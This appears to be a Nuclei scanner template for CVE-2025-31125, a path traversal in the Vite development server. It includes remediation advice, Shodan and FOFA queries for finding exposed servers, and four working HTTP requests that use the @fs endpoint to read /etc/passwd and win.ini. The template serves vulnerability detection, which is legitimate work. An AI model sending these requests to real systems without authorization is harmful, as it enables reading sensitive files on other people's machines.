id: CVE-2025-31125 info: name: Vite Development Server - Path Traversal author: martian,ritikchaddha,v2htw severity: medium description: | Path traversal vulnerability in Vite development server's @fs endpoint allows attackers to access files outside the intended directory. When exposed to the network, attackers can exploit this via crafted URLs to access sensitive system files. impact: | Attackers can exploit path traversal in the @fs endpoint to access files outside the intended directory when the Vite dev server is exposed to the network, potentially reading sensitive system files. remediation: | Upgrade to the patched version or avoid exposing the Vite development server to the network (do not use --host flag or configure server.host); if upgrading is not immediately possible, implement access restrictions to the Vite development server reference: - https://github.com/vitejs/vite/issues/8498 - https://github.com/vitejs/vite/pull/8804 - https://github.com/vitejs/vite/pull/8979 - https://nvd.nist.gov/vuln/detail/CVE-2025-31125 classification: cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N cvss-score: 5.3 cve-id: CVE-2025-31125 epss-score: 0.58801 epss-percentile: 0.99011 cwe-id: CWE-200 metadata: verified: true max-requests: 4 shodan-query: title:"Vite App" fofa-query: title="Vite App" tags: cve,cve2025,vite,lfi,vkev,vuln,kev http: - raw: - | GET /@fs/C:/windows/win.ini?import&?inline=1.wasm?init HTTP/1.1 Host: {{Hostname}} - | GET /@fs/etc/passwd?import&?inline=1.wasm?init HTTP/1.1 Host: {{Hostname}} - | GET /@fs/../../../../../../../etc/passwd?import&?inline=1.wasm?init HTTP/1.1 Host: {{Hostname}} - | GET /@fs/%252e%252e/%252e%252e/%252e%252e/etc/passwd?import&?inline=1.wasm?init HTTP/1.1 Host: {{Hostname}} stop-at-first-match: true matchers-condition: and matchers: - type: word part: body words: - "data:application/octet-stream" - "base64" - "import init" condition: and - type: word part: header words: - "text/javascript" # digest: 4a0a0047304502200668e18be0813242ca56dd86e6b90617b5721c4c0176f4e468ce33ef528005d6022100936390abd653bde8cac90bdf5c51683436d15be1c24e75c8dea5d34af4755d1b:922c64590222798bb761d5b6d8e72950